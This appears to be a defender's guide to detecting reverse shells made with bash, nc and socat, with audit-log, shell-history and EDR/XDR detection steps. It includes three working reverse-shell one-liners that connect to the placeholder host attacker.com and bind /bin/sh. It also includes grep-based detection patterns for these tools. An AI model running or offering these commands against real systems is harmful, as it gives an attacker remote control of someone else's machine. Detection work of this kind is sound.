Reverse Shell

Reverse Shell Detection and Analysis

Reverse shells are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.


Common Commands and Their Usage

1. bash Command

The bash command can establish reverse shells by leveraging /dev/tcp or /dev/udp.

Example:

export RHOST=attacker.com  
export RPORT=12345  
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'

Detection:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "bash" | egrep "udp|tcp"
  • Command History:

    history | grep "bash" | egrep "udp|tcp"
    cat ~/.bash_history | grep "bash" | egrep "udp|tcp"
  • EDR/XDR Logs: Monitor for bash process creation or network events involving /dev/tcp or /dev/udp.

2. nc (Netcat) Command

Netcat is a versatile utility often used for reverse shells.

Example:

RHOST=attacker.com  
RPORT=12345  
nc -e /bin/sh $RHOST $RPORT

Detection:

  • Focus on -e or -l parameters.

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
  • Command History:

    history | grep "nc" | grep "\-e"
    cat ~/.bash_history | grep "nc" | grep "\-e"
  • EDR/XDR Logs: Monitor nc process creation and check for unusual outbound connections.

3. socat Command

socat offers more flexibility than nc, making it a preferred choice for advanced reverse shells.

Example:

RHOST=attacker.com  
RPORT=12345  
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

Detection:

  • Investigate commands using exec and tcp-connect.

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
  • Command History:

    history | grep "socat" | grep -i "exec"
    cat ~/.bash_history | grep "socat" | grep -i "exec"
  • EDR/XDR Logs: Analyze socat processes for suspicious parameters and unexpected network activity.


General Detection Strategies

1. Audit Logs

Continuously monitor /var/log/audit/audit.log for specific commands and associated parameters:

  • Commands to Track: bash, nc, socat

  • Example:

    cat /var/log/audit/audit.log | grep [command]

2. Command History

Regularly inspect command history files for traces of suspicious commands:

  • Interactive Sessions:

    history | grep [command]
  • Persistent Logs:

    cat ~/.bash_history | grep [command]

3. EDR/XDR Solutions

Employ EDR or XDR tools to:

  • Track Process Creation: Identify the origin of reverse shell tools.

  • Analyze Network Activity: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

4. Network Monitoring

Set up alerts for:

  • Unusual Outbound Connections: Look for high-frequency requests to external IPs.

  • Known Malicious Indicators: Monitor outbound traffic to flagged domains or IPs.


Key Takeaways

  • Reverse shells exploit legitimate utilities like bash, nc, and socat for remote control.

  • Detection relies on monitoring suspicious process creation, command execution, and network connections.

  • Forensic Analysis requires correlating data from:

    • Audit logs (/var/log/audit/audit.log).

    • Command histories (history or .bash_history).

    • EDR/XDR telemetry for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.

Last updated